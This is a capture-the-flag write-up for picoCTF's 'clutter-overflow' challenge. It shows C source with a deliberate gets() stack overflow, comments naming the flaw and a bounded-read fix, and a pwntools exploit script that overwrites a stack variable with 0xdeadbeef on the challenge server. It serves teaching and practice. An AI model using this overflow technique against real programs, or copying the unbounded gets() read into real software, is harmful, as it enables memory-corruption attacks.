Binary Exploitation
{"authors": ["ret2basic"]}

clutter-overflow

Solved by ret2basic

Challenge

Clutter, clutter everywhere and not a byte to use.
nc mars.picoctf.net 31890

Recon

Recon

Source Code

#include <stdio.h>
#include <stdlib.h>
/* Size in bytes (0x100 = 256) of the stack buffer that main() reads input into. */
#define SIZE 0x100
/* Value the local `code` must hold for main() to take the flag branch. */
#define GOAL 0xdeadbeef
/*
 * Challenge entry point: reads one line into a fixed-size stack buffer and
 * prints the flag only when the local `code` equals GOAL.
 *
 * Nothing in this function assigns `code` after it is initialised to 0, so
 * the flag branch is reachable only through memory corruption: gets() keeps
 * writing past the end of clutter[] when the input exceeds SIZE bytes.
 *
 * NOTE(review): HEADER is not defined anywhere in this listing; presumably
 * the banner macro was trimmed from the original source.
 *
 * Returns 0 on both branches.
 */
int main(void)
{
/* Comparison target. On an LP64 target this is 8 bytes wide, so all 8 bytes
 * must match GOAL zero-extended -- TODO confirm against the actual binary. */
long code = 0;
/* Fixed SIZE-byte stack buffer. Where it sits relative to `code` is decided
 * by the compiler's frame layout, not by declaration order. */
char clutter[SIZE];
/* Turn off stdio buffering on all three streams (presumably so prompts reach
 * a network client immediately). */
setbuf(stdout, NULL);
setbuf(stdin, NULL);
setbuf(stderr, NULL);
puts(HEADER);
puts("My room is so cluttered...");
puts("What do you see?");
/* Root cause: gets() takes no length and cannot bound the write (it was
 * removed from the language in C11). A bounded read such as
 * fgets(clutter, sizeof(clutter), stdin) would keep input inside the buffer. */
gets(clutter);
if (code == GOAL) {
/* NOTE(review): %llx expects unsigned long long, but GOAL (0xdeadbeef) is not
 * of that type -- format/argument mismatch. */
printf("code == 0x%llx: how did that happen??\n", GOAL);
puts("take a flag for your troubles");
system("cat flag.txt");
} else {
/* NOTE(review): same mismatch here -- `code` is a long, not a long long. */
printf("code == 0x%llx\n", code);
printf("code != 0x%llx :(\n", GOAL);
}
return 0;
}

Solution

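Overwrite the `code` variable with 0xdeadbeef. `gets()` does no bounds checking, so input longer than the 0x100-byte `clutter` buffer keeps writing up the stack until it reaches `code`; the offset used in the exploit below (0x110 - 0x8 = 0x108 bytes) is the distance from the start of `clutter` to `code` in this binary. On the program side the root cause goes away with a bounded read such as `fgets(clutter, sizeof(clutter), stdin)`.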

Exploit

#!/usr/bin/env python3
from pwn import *
# -------- Setup -------- #
# With an amd64 context, pwntools packs integers as 8-byte little-endian words.
context(arch="amd64", os="linux")
# The local copy of the challenge binary is loaded but not referenced again below.
elf = ELF("./chall", checksec=False)
target = ("mars.picoctf.net", 31890)

# -------- Overwrite variable -------- #
# 0x110 and 0x8 are presumably the rbp-relative offsets of clutter[] and `code`
# read from the binary's disassembly (not shown on this page) -- confirm locally.
# Their difference, 0x108 = 264 bytes, spans the 0x100-byte buffer plus what
# looks like 8 bytes of compiler padding before `code`.
offset = 0x110 - 0x8
filler = b"A" * offset
# `code` is compared as a long, so the value is written as a full 8-byte word.
payload = filler + p64(0xdeadbeef)

conn = remote(*target)
conn.sendlineafter('What do you see?\n', payload)
conn.interactive()